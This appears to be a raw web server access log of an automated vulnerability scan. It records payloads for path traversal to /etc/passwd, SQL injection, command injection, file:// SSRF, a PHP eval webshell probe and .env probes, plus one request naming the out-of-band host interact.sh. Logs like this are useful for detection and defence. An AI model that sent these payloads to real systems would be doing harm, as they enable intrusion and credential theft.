205.185.122.202 - - [19/Oct/2025:21:00:41 +0530] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:00:42 +0530] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:00:44 +0530] "GET /api/v1/users/connection-token/ HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:00:44 +0530] "GET /api/v1/authentication/connection-token/ HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:00:46 +0530] "POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp=&nonce= HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:00:50 +0530] "GET /api/geojson?url=file:/etc/passwd HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:00:52 +0530] "GET /rest/api/latest/projects/BIZEE/repos/bizee-communication-api/archive?filename=wN3Am&at=wN3Am&path=wN3Am&prefix=ax%00--exec=%60cat%20/etc/passwd%60%00--remote=origin HTTP/1.1" 404 1130
205.185.122.202 - - [19/Oct/2025:21:00:55 +0530] "GET /index.php?m=wap&c=index&a=init&siteid=1 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:00:56 +0530] "GET /resources//../WEB-INF/web.xml HTTP/1.1" 404 992
205.185.122.202 - - [19/Oct/2025:21:00:58 +0530] "GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:00:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:00:59 +0530] "POST / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:21:01:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:01:01 +0530] "GET /ui_base/js/../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:01:03 +0530] "GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:01:03 +0530] "GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:21:01:06 +0530] "GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:01:06 +0530] "GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:01:07 +0530] "GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+42323*43564,1--+&site=admin HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:01:09 +0530] "POST /defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:01:13 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:01:16 +0530] "GET /client/index.php HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:01:17 +0530] "POST /content/ucgxau HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:01:18 +0530] "POST /content/zlxbyw HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:01:19 +0530] "GET /FileUploadServices/MOBFileUpload.ashx HTTP/1.1" 404 1068
195.96.129.4 - - [19/Oct/2025:21:01:20 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:01:21 +0530] "GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:01:24 +0530] "GET /index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8%27)%20and%20extractvalue(1,concat(1,(select%20md5(760)),0x7e))%20and%20(%271%27=%271&spec_array[]=9 HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:21:01:24 +0530] "GET /index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7%20and%20extractvalue(1,concat(1,(select%20md5(777)),0x7e))%20and%201=1&attr_array[][2]=8&spec_array[]=9 HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:21:01:25 +0530] "GET /app/kibana HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:01:29 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:01:29 +0530] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:01:30 +0530] "GET /api/get_device_details HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:01:32 +0530] "GET /wp-admin/admin-ajax.php?action=shareaholic_debug_info HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:01:33 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:01:34 +0530] "GET /WiFi.shtml HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:01:37 +0530] "GET /data/users/admin.xml HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:01:38 +0530] "GET /info HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:21:01:41 +0530] "GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 1146
205.185.122.202 - - [19/Oct/2025:21:01:42 +0530] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:01:44 +0530] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(37417989)),1) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:01:45 +0530] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:01:48 +0530] "POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:01:49 +0530] "GET /plug/oem/AspCms_OEMFun.asp HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:01:51 +0530] "GET /index.php?s=amulo HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:01:52 +0530] "GET /api/v1/users/connection-token/ HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:21:01:52 +0530] "GET /api/v1/authentication/connection-token/ HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:21:01:55 +0530] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:01:55 +0530] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:01:56 +0530] "GET /api/geojson?url=file:/etc/passwd HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:01:59 +0530] "POST /directdata/direct/router HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:01:59 +0530] "GET /index.php?m=wap&c=index&a=init&siteid=1 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:02:01 +0530] "GET /admin/event/uploadimg.html HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:02:02 +0530] "GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:02:04 +0530] "GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:21:02:05 +0530] "GET /ui_base/js/../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:02:08 +0530] "GET /admin%20/mail-server HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:02:08 +0530] "GET /admin%20/db HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:02:09 +0530] "GET /admin%20/db/edit HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:02:09 +0530] "GET /admin%20/license HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:02:10 +0530] "GET /admin%20/logging HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:02:10 +0530] "GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:02:10 +0530] "GET /admin%20/server-settings HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:02:10 +0530] "GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:02:10 +0530] "GET /admin%20/authentication HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:02:11 +0530] "GET /admin%20/avatars HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:02:11 +0530] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:02:13 +0530] "POST /defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:02:14 +0530] "GET /api.php?c=project&f=index&token=1234&id=news&sort=1 null" 400 -
205.185.122.202 - - [19/Oct/2025:21:02:15 +0530] "GET /client/index.php HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:02:17 +0530] "POST /cgi-bin/get_file.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:02:18 +0530] "GET /FileUploadServices/MOBFileUpload.ashx HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:02:20 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:02:21 +0530] "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27932833812%27)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1" 404 1178
205.185.122.202 - - [19/Oct/2025:21:02:21 +0530] "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27923124604%27)),3,32)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1" 404 1178
205.185.122.202 - - [19/Oct/2025:21:02:21 +0530] "GET /index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8%27)%20and%20extractvalue(1,concat(1,(select%20md5(787)),0x7e))%20and%20(%271%27=%271&spec_array[]=9 HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:21:02:22 +0530] "GET /index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7%20and%20extractvalue(1,concat(1,(select%20md5(667)),0x7e))%20and%201=1&attr_array[][2]=8&spec_array[]=9 HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:21:02:24 +0530] "POST /index.php?/manage/channel/addchannel HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:02:25 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:02:25 +0530] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:02:26 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:02:27 +0530] "GET /wp-admin/admin-ajax.php?action=shareaholic_debug_info HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:02:30 +0530] "GET /admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10& HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:02:31 +0530] "GET /data/users/admin.xml HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:02:35 +0530] "GET /index.php?m=user&c=Users&a=logout&referurl=https://example.com HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:02:36 +0530] "GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 1146
205.185.122.202 - - [19/Oct/2025:21:02:37 +0530] "GET /home.asp?userLogin.asp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:02:38 +0530] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(13344273)),1) HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:02:39 +0530] "GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:02:41 +0530] "POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:02:42 +0530] "POST /Upload/upload_file.php?l=hqkky HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:02:44 +0530] "GET /index.php?s=yqgqc HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:02:47 +0530] "GET /Images/Remote?imageUrl=http://example.com/ HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:02:47 +0530] "GET /Items/RemoteSearch/Image?ImageUrl=http://example.com&ProviderName=TheMovieDB HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:02:50 +0530] "GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:02:50 +0530] "GET /?c=../../../../../../etc/passwd%00 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:02:54 +0530] "POST /upload/UploadResourcePic.ashx?ResourceID=6116 HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:02:55 +0530] "POST /directdata/direct/router HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:02:58 +0530] "GET /photo/combine.php?type=javascript&g=core-r7rules/../../../dbadblln.php. HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:02:59 +0530] "GET /admin/event/uploadimg.html HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:21:03:00 +0530] "GET /run HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:21:03:01 +0530] "GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1" 404 1080
205.185.122.202 - - [19/Oct/2025:21:03:03 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:03:04 +0530] "GET /admin%20/mail-server HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:03:04 +0530] "GET /admin%20/db HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:03:04 +0530] "GET /admin%20/db/edit HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:03:05 +0530] "GET /admin%20/license HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:03:05 +0530] "GET /admin%20/logging HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:03:05 +0530] "GET /admin%20/server-settings HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:03:06 +0530] "GET /admin%20/authentication HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:03:06 +0530] "GET /comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:03:06 +0530] "GET /admin%20/avatars HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:21:03:06 +0530] "GET /MicroStrategyWS/happyaxis.jsp HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:03:09 +0530] "PUT /cgi-bin/dxkcjqi.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:03:10 +0530] "GET /api.php?c=project&f=index&token=1234&id=news&sort=1 null" 400 -
204.76.203.15 - - [19/Oct/2025:21:03:10 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:03:15 +0530] "PUT /SDK/webLanguage HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:03:17 +0530] "POST /cgi-bin/get_file.php HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:03:19 +0530] "GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:03:21 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:03:22 +0530] "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27932420742%27)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1" 404 1178
205.185.122.202 - - [19/Oct/2025:21:03:23 +0530] "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27932460461%27)),3,32)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1" 404 1178
205.185.122.202 - - [19/Oct/2025:21:03:23 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:03:24 +0530] "POST /index.php?/manage/channel/addchannel HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:03:26 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:03:26 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:03:28 +0530] "GET /kylin/api/admin/config HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:03:29 +0530] "GET /admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10& HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:03:31 +0530] "GET /storage/logs/laravel.log HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:03:32 +0530] "GET /index.php?m=user&c=Users&a=logout&referurl=https://example.com HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:03:34 +0530] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+md5('dswgd'),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:03:35 +0530] "GET /home.asp?userLogin.asp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:03:36 +0530] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20903882704%20%2B%20883597757)%3Eealbziopsb HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:03:37 +0530] "GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:03:39 +0530] "POST /test/test1/123 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:03:40 +0530] "POST /Upload/upload_file.php?l=yktbd HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:03:42 +0530] "GET /tmui/login.jsp HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:03:43 +0530] "GET /Images/Remote?imageUrl=http://example.com/ HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:03:43 +0530] "GET /Items/RemoteSearch/Image?ImageUrl=http://example.com&ProviderName=TheMovieDB HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:03:46 +0530] "GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','15164')),3,32)-- HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:03:48 +0530] "POST /upload/UploadResourcePic.ashx?ResourceID=1563 HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:03:50 +0530] "GET /api/system/deviceinfo HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:03:50 +0530] "GET /photo/combine.php?type=javascript&g=core-r7rules/../../../ihfinyey.php. HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:03:52 +0530] "GET /%2557EB-INF/web.xml HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:03:52 +0530] "GET /static?/%2557EB-INF/web.xml HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:03:53 +0530] "GET /run HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:21:03:55 +0530] "GET /?query=select%20lower(hex(MD5('894895939'))) HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:03:56 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:03:59 +0530] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20950712251%20%2B%20800940961%20%20%23 HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:21:04:00 +0530] "GET /comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:04:02 +0530] "GET /cgi-bin/slogin/login.py HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:04:03 +0530] "PUT /cgi-bin/dlrffel.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:04:06 +0530] "GET /web/addons/upload.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:04:07 +0530] "PUT /SDK/webLanguage HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:04:10 +0530] "POST /webtools/control/xmlrpc HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:04:11 +0530] "GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:04:15 +0530] "POST /webtools/control/xmlrpc HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:04:16 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:04:18 +0530] "GET /hosts HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:21:04:18 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:04:19 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:04:22 +0530] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:04:23 +0530] "GET /kylin/api/admin/config HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:04:24 +0530] "POST /ispirit/interface/gateway.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:04:25 +0530] "GET /storage/logs/laravel.log HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:04:26 +0530] "GET /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(203462971),0x7e),1)--+ HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:04:27 +0530] "GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+md5('nemhe'),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:04:28 +0530] "GET /css_parser.php?css=css_parser.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:04:29 +0530] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20906929210%20%2B%20962250910)%3Euyuefnxqwo HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:04:31 +0530] "POST /UploadFileData?action=upload_file&filename=../.zrkstt.jsp HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:04:31 +0530] "POST /test/test1/123 HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:04:32 +0530] "POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:04:33 +0530] "GET /tmui/login.jsp HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:04:35 +0530] "GET /forum.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:04:36 +0530] "GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y'+union+select+substring(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','16780')),3,32)-- HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:04:39 +0530] "GET /CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:04:40 +0530] "GET /api/system/deviceinfo HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:04:43 +0530] "POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:21:04:44 +0530] "GET /%2557EB-INF/web.xml HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:04:45 +0530] "GET /static?/%2557EB-INF/web.xml HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:04:47 +0530] "GET /configurations HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:04:49 +0530] "GET /?query=select%20lower(hex(MD5('887532377'))) HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:04:51 +0530] "GET /events/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:04:52 +0530] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20887889578%20%2B%20982503245%20%20%23 HTTP/1.1" 404 1094
205.185.122.202 - - [19/Oct/2025:21:04:54 +0530] "GET /.env HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:21:04:54 +0530] "GET /cgi-bin/slogin/login.py HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:04:58 +0530] "GET /prweb/PRAuth/app/default/ HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:04:59 +0530] "GET /web/addons/upload.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:05:01 +0530] "POST /php/change_config.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:05:02 +0530] "POST /webtools/control/xmlrpc HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:05:05 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:05:06 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:05:07 +0530] "POST /webtools/control/xmlrpc HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:05:11 +0530] "POST /nagiosql/admin/menuaccess.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:05:12 +0530] "GET /hosts HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:21:05:12 +0530] "POST /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:05:15 +0530] "PUT /api/users HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:05:15 +0530] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:05:16 +0530] "GET /new/newhttp:/interact.sh HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:05:17 +0530] "POST /ispirit/interface/gateway.php HTTP/1.1" 404 1052
